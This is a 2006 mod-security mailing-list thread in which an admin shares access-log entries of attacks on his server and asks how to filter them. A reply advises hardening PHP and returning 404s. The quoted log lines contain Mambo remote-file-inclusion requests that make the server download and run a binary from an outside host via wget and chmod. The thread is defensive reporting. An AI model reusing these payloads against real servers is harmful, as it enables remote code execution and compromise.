Hi,
Just ban wget, fetch and other dl clients, suspicious name is URL-s and of course you should secure
your PHP (safe_mode, disable_functions, open_basedir).
For xmlrpc you may filter on the post payload, i'm not familiar with that security flaw.
IMHO you should give them a 404 and nothing more. I think the a best defense is showing them that
there's nothing to exploit. When too many of these actions come to your webserver you may DoS the
system you're redirecting to and giving a new target as well.
You may write letters to the abuse addresses of the network admins, because these are zombie
machines almost everytime. On my webserver i got them coming from 3000-5000 addresses, but they're
referer spams. I redirect them to localhost (to their localhost) with mod_rewrite. :)
Computer users tend to be very ignorant about security flaws lately, so there's no much we can do,
besides a 404. :(
Regards,
Andrej
Ral...@it... wrote:
> Hello,
>
> I guess evil noise like that is mundane encounter to any WWW
> webserver admin
> and probably an unavoidable plague as is SPAM for SMTP relays.
>
> Because I haven't administered a WWW servicing webserver yet
> I luckily have missed such filth so far.
>
> Of course these requests aren't serviced by our webserver and
> mod_security dutifully
> sends them a 404,
> nevertheless they waste bandwidth, file system space for their
> logging and processing resources.
>
> On the other hand I'am hesitant to drop those source IP addresses
> by my packet filter
> because I suspect them (if not spoofed) to originate from an
> ISP's dynamic IP pool,
> and thereby blocking the next unlucky decent guy who happens have
> temporarily assigned such
> an abused IP address.
>
> So I would like to ask you seasoned webserver admins how best to
> handle these requests?
>
> Do you simply drop them,
> or do you redirect them to sites e.g. such as
> http://www.gulli.com/ ,
> or some CERT blacklist etc.?
>
> As for mod_security,
> what would a neat filter look like to counter or trick them?
> Is the setup of a honeypod that would draw attention from the
> webserver advisable,
> or is such in vain?
>
> Here's an excerpt from our access_log of requests trying to wget
> and run some hostile code
> through our webserver.
> As these reappear on a regular basis
> I assume that some attack kits that generate them are in
> widespread use.
>
>
> 203.221.23.212 - - [23/Feb/2006:03:56:54 +0100] "GET
> /index2.php?option=com_content&do_pdf=1&id=1index2
> .php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mos
> Config_absolute_path=http://209.123.16
> .34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/gicumz;chmod%2074
> 4%20gicumz;./gicumz;echo%20YYY;echo|
> HTTP/1.1" 404 208
> 203.221.23.212 - - [23/Feb/2006:03:56:55 +0100] "GET
> /index.php?option=com_content&do_pdf=1&id=1index2.
> php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosC
> onfig_absolute_path=http://209.123.16.
> 34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/gicumz;chmod%20744
> %20gicumz;./gicumz;echo%20YYY;echo| H
> TTP/1.1" 404 207
> 203.221.23.212 - - [23/Feb/2006:03:56:57 +0100] "GET
> /mambo/index2.php?_REQUEST[option]=com_content&_RE
> QUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.1
> 6.34/cmd.gif?&cmd=cd%20/tmp;wget%20209
> .123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo|
> HTTP/1.1" 404 214
> 203.221.23.212 - - [23/Feb/2006:03:56:58 +0100] "GET
> /cvs/index2.php?_REQUEST[option]=com_content&_REQU
> EST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.
> 34/cmd.gif?&cmd=cd%20/tmp;wget%20209.1
> 23.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo|
> HTTP/1.1" 404 212
> 203.221.23.212 - - [23/Feb/2006:03:56:59 +0100] "GET
> /articles/mambo/index2.php?_REQUEST[option]=com_co
> ntent&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://
> 209.123.16.34/cmd.gif?&cmd=cd%20/tmp;w
> get%20209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20Y
> YY;echo| HTTP/1.1" 404 223
> 203.221.23.212 - - [23/Feb/2006:03:57:01 +0100] "GET
> /cvs/mambo/index2.php?_REQUEST[option]=com_content
> &_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.1
> 23.16.34/cmd.gif?&cmd=cd%20/tmp;wget%2
> 0209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;ec
> ho| HTTP/1.1" 404 218
> 203.221.23.212 - - [23/Feb/2006:03:57:02 +0100] "POST /xmlrpc.php
> HTTP/1.1" 403 212
> 203.221.23.212 - - [23/Feb/2006:03:57:03 +0100] "POST
> /blog/xmlrpc.php HTTP/1.1" 403 217
> 203.221.23.212 - - [23/Feb/2006:03:57:05 +0100] "POST
> /blog/xmlsrv/xmlrpc.php HTTP/1.1" 403 224
> 203.221.23.212 - - [23/Feb/2006:03:57:06 +0100] "POST
> /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 403 225
> 203.221.23.212 - - [23/Feb/2006:03:57:07 +0100] "POST
> /drupal/xmlrpc.php HTTP/1.1" 403 219
> 203.221.23.212 - - [23/Feb/2006:03:57:09 +0100] "POST
> /phpgroupware/xmlrpc.php HTTP/1.1" 403 225
> 203.221.23.212 - - [23/Feb/2006:03:57:10 +0100] "POST
> /wordpress/xmlrpc.php HTTP/1.1" 403 222
> 203.221.23.212 - - [23/Feb/2006:03:57:11 +0100] "POST /xmlrpc.php
> HTTP/1.1" 403 212
> 203.221.23.212 - - [23/Feb/2006:03:57:13 +0100] "POST
> /xmlrpc/xmlrpc.php HTTP/1.1" 403 219
> 203.221.23.212 - - [23/Feb/2006:03:57:14 +0100] "POST
> /xmlsrv/xmlrpc.php HTTP/1.1" 403 219
>
>
>
> -------------------------------------------------------
> This SF.Net email is sponsored by xPML, a groundbreaking scripting language
> that extends applications into web and mobile media. Attend the live webcast
> and join the prime developer group breaking into this new coding territory!
> http://sel.as-us.falkag.net/sel?cmd=k&kid�0944&bid$1720&dat�1642
> _______________________________________________
> mod-security-users mailing list
> mod...@li...
> https://lists.sourceforge.net/lists/listinfo/mod-security-users
>
|
